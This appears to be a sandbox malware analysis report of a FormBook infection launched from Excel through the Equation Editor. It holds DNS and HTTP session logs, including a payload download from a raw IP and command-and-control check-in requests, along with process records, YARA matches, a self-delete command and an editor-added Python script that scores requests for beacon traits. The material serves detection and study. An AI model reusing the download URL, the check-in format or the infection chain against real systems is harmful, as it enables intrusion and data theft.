                                        Dec 2, 2021 19:19:40.940474987 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | Name error (3) | www.ll1ysq.biz | none | none | A (IP address) | IN (0x0001)
                                        Dec 2, 2021 19:19:49.426925898 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.sdffzc.com | minisite.alibaba.com | | CNAME (Canonical name) | IN (0x0001)
                                        Dec 2, 2021 19:19:49.426925898 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | minisite.alibaba.com | minisite.alibaba.com.gds.alibabadns.com | | CNAME (Canonical name) | IN (0x0001)
                                        Dec 2, 2021 19:19:49.426925898 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | minisite.alibaba.com.gds.alibabadns.com | | 47.246.136.142 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • 107.173.191.75
                                        • www.travelgleam.com
                                        • www.sdffzc.com

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.22 | 49165 | 107.173.191.75 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Dec 2, 2021 19:18:07.391019106 CET | 0 | OUT | GET /dodge/winlogon.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 107.173.191.75
                                        Connection: Keep-Alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 107.173.191.75 | 80 | 192.168.2.22 | 49165 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Timestamp | kBytes transferred | Direction | Data
                                        Dec 2, 2021 19:18:07.507664919 CET | 1 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 02 Dec 2021 18:18:07 GMT
                                        Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.33
                                        Last-Modified: Thu, 02 Dec 2021 08:53:53 GMT
                                        ETag: "7d5a3-5d225ee196c33"
                                        Accept-Ranges: bytes
                                        Content-Length: 513443
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        2 | 192.168.2.22 | 49166 | 162.210.195.97 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Dec 2, 2021 19:19:29.260524035 CET | 544 | OUT | GET /hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== HTTP/1.1
                                        Host: www.travelgleam.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Dec 2, 2021 19:19:30.328233004 CET | 545 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Thu, 02 Dec 2021 18:19:30 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        X-Redirect-By: WordPress
                                        Set-Cookie: ads_session_352ccc2461df9c8d3c6bb4585f3c3cb2=af6ddcc617a3e1afebfd91a704249aef%7C%7C1638641970%7C%7C1638638370%7C%7Cda48612d1ed0b29c93d61e3989fe0d16; expires=Sat, 01-Jan-2022 18:19:30 GMT; Max-Age=2592000; path=/
                                        Set-Cookie: PHPSESSID=b3d6c12ed435fd207b9e867cc70e2029; path=/
                                        Location: http://travelgleam.com/hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A==
                                        X-XSS-Protection: 1; mode=block
                                        X-Content-Type-Options: nosniff
                                        X-Nginx-Upstream-Cache-Status: MISS
                                        X-Server-Powered-By: Engintron


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        3 | 192.168.2.22 | 49168 | 47.246.136.142 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Dec 2, 2021 19:19:49.540569067 CET | 546 | OUT | GET /hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa HTTP/1.1
                                        Host: www.sdffzc.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Dec 2, 2021 19:19:49.653724909 CET | 547 | IN | HTTP/1.1 429
                                        Server: Tengine
                                        Date: Thu, 02 Dec 2021 18:19:49 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: ali_apache_id=84.17.52.65.1638469189599.912680.7; path=/; domain=.alibaba.com; expires=Wed, 30-Nov-2084 01:01:01 GMT
                                        ETag: "6188f55d-216"
                                        Data Raw: 32 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 48 54 54 50 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 41 52 43 48 49 56 45 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 69 66 20 28 2f 5e 5c 2f 70 72 6f 64 75 63 74 5c 2f 5c 64 2b 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 29 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 2f 27 3b 0a 7d 20 65 6c 73 65 20 69 66 20 28 2f 5e 2e 2a 5c 2e 6d 2e 5b 61 2d 7a 5d 2b 5c 2e 61 6c 69 62 61 62 61 5c 2e 63 6f 6d 24 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 29 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 2f 2f 6d 2e 61 6c 69 62 61 62 61 2e 63 6f 6d 2f 65 72 72 6f 72 34 30 34 2e 68 74 6d 27 3b 0a 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 2f 2f 65 72 72 6f 72 2e 61 6c 69 62 61 62 61 2e 63 6f 6d 2f 65 72 72 6f 72 34 30 34 2e 68 74 6d 27 3b 0a 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 216<!doctype html><html lang="en"><head><meta charset="UTF-8"><title>HTTP 404</title><meta name="ROBOTS" content="NOARCHIVE"><meta name="ROBOTS" content="NOINDEX, NOFOLLOW" /><script type="text/javascript">if (/^\/product\/\d+/.test(window.location.pathname)) { window.location.href = '/';} else if (/^.*\.m.[a-z]+\.alibaba\.com$/.test(window.location.hostname)) { window.location.href = '//m.alibaba.com/error404.htm';} else { window.location.href = '//error.alibaba.com/error404.htm';}</script></head></html>0
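The session above is the injected explorer.exe checking in: a bare GET with only Host and Connection headers, a short path (/hf9j/) and a two-parameter query whose longer value is base64-like, followed by seven null bytes. This particular check-in failed (www.sdffzc.com answered from an Alibaba-hosted Tengine front end with a 429 status and a generic 404 page), but the request shape is the useful detection artefact. The script below is an added example by the editor, not Joe Sandbox output and not FormBook code: it parses raw HTTP requests and scores them against those traits. The sample input is transcribed from the request on this page plus one constructed browser request for contrast; the system-binary list, the "short path" and "base64-like" patterns and the threshold are the editor's assumptions to tune per environment.

```python
import re

# Constructed sample: the explorer.exe request transcribed from this page,
# plus one ordinary browser request for contrast. Not a pcap, not sandbox output.
SAMPLE_REQUESTS = [
    {
        "process": r"C:\Windows\explorer.exe",
        "dst": "47.246.136.142:80",
        "raw": (
            "GET /hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/"
            "XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa HTTP/1.1\r\n"
            "Host: www.sdffzc.com\r\nConnection: close\r\n\r\n"
        ),
    },
    {
        "process": r"C:\Program Files\Mozilla Firefox\firefox.exe",  # constructed control
        "dst": "93.184.216.34:80",
        "raw": (
            "GET /index.html?lang=en HTTP/1.1\r\nHost: example.com\r\n"
            "User-Agent: Mozilla/5.0\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"
        ),
    },
]

# Assumptions (editor's, tune per environment): Windows binaries that should not
# originate HTTP themselves, and what counts as a "short path" and a base64 blob.
SYSTEM_BINARIES = {"explorer.exe", "msiexec.exe", "svchost.exe"}
BASE64_LIKE = re.compile(r"^[A-Za-z0-9+/]{30,}={0,2}$")
SHORT_RANDOM_PATH = re.compile(r"^/[a-z0-9]{3,6}/$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query and headers.
    The query is split by hand so '+' and '/' inside base64 survive intact."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query_string = target.partition("?")
    query = {}
    for pair in filter(None, query_string.split("&")):
        key, _, value = pair.partition("=")
        query[key] = value
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers}


def beacon_indicators(entry):
    """Return the FormBook-style check-in traits present in one request."""
    req = parse_request(entry["raw"])
    reasons = []
    image = entry["process"].rsplit("\\", 1)[-1].lower()
    if image in SYSTEM_BINARIES:
        reasons.append("HTTP originated by a Windows system binary")
    if "user-agent" not in req["headers"]:
        reasons.append("no User-Agent header")
    if req["headers"].get("connection", "").lower() == "close":
        reasons.append("Connection: close (one request per connection)")
    if SHORT_RANDOM_PATH.match(req["path"]):
        reasons.append("short random-looking path")
    if len(req["query"]) == 2 and any(BASE64_LIKE.match(v) for v in req["query"].values()):
        reasons.append("two-parameter query carrying a base64-like blob")
    return reasons


def is_beacon(entry, threshold=3):
    """True when enough traits coincide; the threshold is an assumption."""
    return len(beacon_indicators(entry)) >= threshold


if __name__ == "__main__":
    for entry in SAMPLE_REQUESTS:
        print(entry["process"], "->", entry["dst"], beacon_indicators(entry))
```

Any single trait is common in benign traffic (plenty of tooling omits User-Agent); the value is in the conjunction, especially a system binary such as explorer.exe making the request at all, which is why the process attribution from the sandbox's session table is carried alongside the raw request.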


                                        Code Manipulations

                                        Statistics

                                        Behavior


                                        System Behavior

                                        General

                                        Start time:19:17:22
                                        Start date:02/12/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13f7d0000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:19:17:46
                                        Start date:02/12/2021
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:19:17:49
                                        Start date:02/12/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:513443 bytes
                                        MD5 hash:8E90E8E526BC80036BA6B50A913A1880
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:19:17:52
                                        Start date:02/12/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:513443 bytes
                                        MD5 hash:8E90E8E526BC80036BA6B50A913A1880
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:19:17:56
                                        Start date:02/12/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xffa10000
                                        File size:3229696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Start time:19:18:18
                                        Start date:02/12/2021
                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\msiexec.exe
                                        Imagebase:0x610000
                                        File size:73216 bytes
                                        MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:19:18:22
                                        Start date:02/12/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\Public\vbc.exe"
                                        Imagebase:0x49e40000
                                        File size:302592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis
